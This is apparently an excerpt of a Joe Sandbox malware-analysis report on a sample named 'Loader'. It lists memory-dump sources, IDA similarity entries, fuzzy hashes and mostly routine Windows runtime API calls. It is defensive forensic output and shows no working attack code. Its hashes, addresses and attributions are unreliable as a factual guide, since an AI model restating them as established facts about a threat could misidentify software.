                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: bd11726e43fec86c8a9b7399cc1b7460c01bc0166fd5fc1c576f1d0b3f48c6b1
                                                                                                  • Instruction ID: 4e23b6af8506301bf5dec00c9888ab3dce8ceb8390f1eb7f7a34a99ca0fdab46
                                                                                                  • Opcode Fuzzy Hash: bd11726e43fec86c8a9b7399cc1b7460c01bc0166fd5fc1c576f1d0b3f48c6b1
                                                                                                  • Instruction Fuzzy Hash: 8DF0E53630034957CB04AF35DC5566B7F94EFC2731B0A405AEA098B691C775D946CBB0
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D40A63,?,20001004,00000000,00000002,?,?,00D3F971), ref: 00D46429
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: d2b6762c4c72b0a555b2713594ffb3338a3b9f58b78396d1fb1ad746a9defefa
                                                                                                  • Instruction ID: 9cc61d3d33f5e76edd30ac2f4ce282d4e15df69c918449d3c117518e24ec508d
                                                                                                  • Opcode Fuzzy Hash: d2b6762c4c72b0a555b2713594ffb3338a3b9f58b78396d1fb1ad746a9defefa
                                                                                                  • Instruction Fuzzy Hash: AEE04F31500218BBCF162F61DC05EAE7F16EF457A1F048020FD0666221CB31CA20AAF2
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 00D39A6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: 35590bcc68b31ae5267bcd5680c9309f2bc915bc83535afc6613f901f602b159
                                                                                                  • Instruction ID: cadde423ef125eae002bca6359cb76766bdc8434228cda4e5f9dda8945995976
                                                                                                  • Opcode Fuzzy Hash: 35590bcc68b31ae5267bcd5680c9309f2bc915bc83535afc6613f901f602b159
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: e33dfcd8ea3040554d948de8962e085a3e380efa3e694121439f7eb624361c57
                                                                                                  • Instruction ID: fc96dd8bf5e1581602b54b98d36a307b2c52b9d753dd4f444906f671e80288f0
                                                                                                  • Opcode Fuzzy Hash: e33dfcd8ea3040554d948de8962e085a3e380efa3e694121439f7eb624361c57
                                                                                                  • Instruction Fuzzy Hash: 7CA012341003018F53004F315904A083BD499411813084095D404C4220D76040406F20
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca763dd9b553fac3fe5c042bb02132b10217fc68e25bae804101696c222b910a
                                                                                                  • Instruction ID: 96d22183dc9e480340878181ed4cf5435dacf7fb70142563a37e94e0c1fa98c6
                                                                                                  • Opcode Fuzzy Hash: ca763dd9b553fac3fe5c042bb02132b10217fc68e25bae804101696c222b910a
                                                                                                  • Instruction Fuzzy Hash: 5CD0923A641A58AFC210CF49E440D41F7B8FB8E770B154166EA48D3B20C771FC11CAE0
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(005D05A8,005D05A8,00000000,7FFFFFFF,?,00D541BD,005D05A8,005D05A8,00000000,005D05A8,?,?,?,?,005D05A8,00000000), ref: 00D54278
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D54333
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D543C2
                                                                                                  • __freea.LIBCMT ref: 00D5440D
                                                                                                  • __freea.LIBCMT ref: 00D54413
                                                                                                  • __freea.LIBCMT ref: 00D54449
                                                                                                  • __freea.LIBCMT ref: 00D5444F
                                                                                                  • __freea.LIBCMT ref: 00D5445F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction ID: 15fad44837684110af583bd7997a4025f4bfbafedad3228c435e9b08788fcfd7
                                                                                                  • Opcode Fuzzy Hash: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction Fuzzy Hash: D1710432940215ABDF209F94CC42BAE7BB9EF4531AF280055FC14B7281D7B5DC888776
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction ID: 497d89c6443eeaffc1686b007b2b10de8b68db27d4be154b6bcbdbf5d3660270
                                                                                                  • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction Fuzzy Hash: 86B14872D00395AFDB11CF28CC91BAEBBA5EF55390F284165E944AB282DB74D901DBB0
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3ABE7
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D3ABEF
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3AC78
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D3ACA3
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D3ACF8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: a571cd8ac4076e4986b1c1358d13404b066a899ff4594213489be66db604a694
                                                                                                  • Instruction ID: 04a725aeb7ad087668dc9e3e3abc5b502a497555bf7b0e95f1626cddb5f08e7e
                                                                                                  • Opcode Fuzzy Hash: a571cd8ac4076e4986b1c1358d13404b066a899ff4594213489be66db604a694
                                                                                                  • Instruction Fuzzy Hash: 9041AF38A00218AFCF10DF6CD885A9EBBA5EF45324F188155E8599B352D731EE05CBB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a45a65005d91d46578a71273f6f2de7b69185a2a68bee1e93ba96ef642fb931
                                                                                                  • Instruction ID: e89031d6cab983fc1354dca7e7acf0676c57ee8662a3915dec6c72abab4e2e37
                                                                                                  • Opcode Fuzzy Hash: 0a45a65005d91d46578a71273f6f2de7b69185a2a68bee1e93ba96ef642fb931
                                                                                                  • Instruction Fuzzy Hash: E0B1DF70A04749AFDF15DFA8D841BAEBBB1EF46391F184148EC0597392C7709A49CB70
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00D44464,00D3A97D,00D39BD4), ref: 00D4447B
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D44489
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D444A2
                                                                                                  • SetLastError.KERNEL32(00000000,00D44464,00D3A97D,00D39BD4), ref: 00D444F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
                                                                                                  • Instruction ID: 2a2c44b47891669cfed7256225866c803f4f4f17fc0810a20fed78d418c190dc
                                                                                                  • Opcode Fuzzy Hash: b426d3f8c851dfca2d2487e0e4e661efe999d98e02d4bf2b5e5b4c9654f88c8e
                                                                                                  • Instruction Fuzzy Hash: 5E01843211A7115FF7243BB4BC85B672B89EB41775B29023AF914952F2EFD14C829670
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D44E6B
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D450E4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: f8e01ee9695aa7a1621ff591ba9f891babdc44eee076efc6e0ce4a6f9d80b029
                                                                                                  • Instruction ID: ed31a868cd5321ec647d1e91ff8bc8395a42fdebdf87c4cdee71cf624081aab5
                                                                                                  • Opcode Fuzzy Hash: f8e01ee9695aa7a1621ff591ba9f891babdc44eee076efc6e0ce4a6f9d80b029
                                                                                                  • Instruction Fuzzy Hash: 97B18B75800209EFCF24DFA4D881AAEB7B5FF04310F18456AF9156B216D771DAA1CBB2
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,00DC7F77,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F22D
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D3F23F
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F261
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: fcadb86682caeb6c0b36a7c8bd516aab2436f8c4bafab8c9d886aadd38877402
                                                                                                  • Instruction ID: 19c9fd0b4ffd320f8a5de00617401f9efeb104b62fb56d3ee2ba223dfddaa6d6
                                                                                                  • Opcode Fuzzy Hash: fcadb86682caeb6c0b36a7c8bd516aab2436f8c4bafab8c9d886aadd38877402
                                                                                                  • Instruction Fuzzy Hash: 3B018B35940769EFDB059B50DC0ABAEBBB8FB44B16F040625EC11E22D0DBB49A04CAA0
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00D377F9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D37804
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D37872
                                                                                                    • Part of subcall function 00D376EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D37707
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D3781F
                                                                                                  • _Yarn.LIBCPMT ref: 00D37835
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: 0d27a0d00a7930cfde7a6aa410c99e73242167045337e3fd9f6c7c04f5b8a608
                                                                                                  • Instruction ID: 6c13d9a841796326f921d460dd9bc3019e020dc52b04ec0b0158db74c1a55451
                                                                                                  • Opcode Fuzzy Hash: 0d27a0d00a7930cfde7a6aa410c99e73242167045337e3fd9f6c7c04f5b8a608
                                                                                                  • Instruction Fuzzy Hash: 040171B5A04A109BCB19EF20D85657DBB71FF94391F180109E80297391DF74AE06CBB1
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC), ref: 00D4F6BD
                                                                                                  • GetLastError.KERNEL32(?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC,00000000,?,00D4539C), ref: 00D4F6C7
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D4F6EF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction ID: 014e889030dcf955d5b1ecae703c09737078cca3275db7b3fdf8a75ba11b6726
                                                                                                  • Opcode Fuzzy Hash: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction Fuzzy Hash: 7EE01230640305BBEB242B61DC0AB593B549B00B56F240070FD0CE41F1DBA29A5099B4
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(00DC7F77,00000000,00000000,?), ref: 00D4D7B1
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D4DA03
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D4DA49
                                                                                                  • GetLastError.KERNEL32 ref: 00D4DAEC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction ID: 82a52bb09c43c81c5781dc12d4e26a9cc18c62cee8e2d19100ddef69c7475478
                                                                                                  • Opcode Fuzzy Hash: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction Fuzzy Hash: 78D179B5D042489FCF15CFA8C881AADBBB6FF09314F28416AE856EB351D770A941CF60
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction ID: ee907328bb4045a527a5194bd8235fa823d1eaacd5f686dc4bc97bdfd0074029
                                                                                                  • Opcode Fuzzy Hash: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction Fuzzy Hash: 7951E372A052069FDB298F54D881BBAB7A9FF04311F18452DE9559B291D731ECC0CBB0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
